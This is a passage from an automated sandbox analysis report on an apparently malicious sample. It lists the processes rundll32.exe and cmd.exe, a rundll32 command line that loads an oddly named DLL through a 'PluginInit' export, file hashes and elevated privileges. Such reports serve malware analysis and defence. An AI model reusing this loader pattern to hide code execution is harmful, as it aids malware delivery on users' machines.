                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:rundll32 ..\ndgfht.frg,PluginInit
                                                    Imagebase:0xe40000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: cmd.exe PID: 3032 Parent PID: 1108

                                                    General

                                                    Start time:18:47:32
                                                    Start date:07/04/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):
                                                    Commandline:C:\Windows\System32\cmd.exe
                                                    Imagebase:
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >